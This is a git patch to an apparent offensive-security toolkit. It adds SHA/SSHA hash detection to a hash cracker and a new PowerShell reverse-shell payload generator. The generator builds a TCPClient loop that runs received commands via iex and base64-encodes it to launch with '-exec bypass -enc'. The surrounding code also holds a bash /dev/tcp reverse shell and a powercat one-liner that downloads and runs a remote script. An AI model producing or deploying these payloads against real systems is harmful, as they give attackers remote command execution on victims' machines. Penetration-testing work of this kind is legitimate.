From 2f555c5b9ec0661bd36a447d194fa444bf6d5147 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Mon, 11 Oct 2021 17:08:44 +0200 Subject: [PATCH] SSHA/SHA hash types + powershell reverse shell --- crack_hash.py | 10 ++++++++++ genRevShell.py | 8 ++++++-- 2 files changed, 16 insertions(+), 2 deletions(-) diff --git a/crack_hash.py b/crack_hash.py index a23fd46..05b16b5 100755 --- a/crack_hash.py +++ b/crack_hash.py @@ -25,6 +25,8 @@ class HashType(enum.Enum): RAW_SHA1 = 100 SHA1_PASS_SALT = 110 SHA1_SALT_PASS = 120 + SHA1 = 101 + SSHA1 = 111 # SHA2 RAW_SHA2_224 = 1300 @@ -123,6 +125,14 @@ class Hash: elif "$" in raw_hash and raw_hash.startswith("pbkdf2_sha256$"): self.type.append(HashType.DJANGO_PBKDF2_SHA256) else: + m = re.match("^\{([^}]*)\}.*$", raw_hash) + if m: + hash_type = m[1] + if hash_type == "SHA": + self.type.append(HashType.SHA1) + elif hash_type == "SSHA": + self.type.append(HashType.SSHA1) + if ":" in raw_hash: parts = raw_hash.split(":") if len(parts) == 2: diff --git a/genRevShell.py b/genRevShell.py index b41d343..519c12c 100755 --- a/genRevShell.py +++ b/genRevShell.py @@ -7,7 +7,7 @@ import util import time import threading import readline - +import base64 def generatePayload(type, local_address, port): @@ -29,8 +29,12 @@ def generatePayload(type, local_address, port): return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port) elif type == "xterm": return "xterm -display %s:1" % (local_address) - elif type == "powercat" or type == "powershell": + elif type == "powercat": return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port) + elif type == "powershell": + payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port) + payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode() + return f"powershell.exe -exec bypass -enc {payload_encoded}" def triggerShell(func, port): def _wait_and_exec():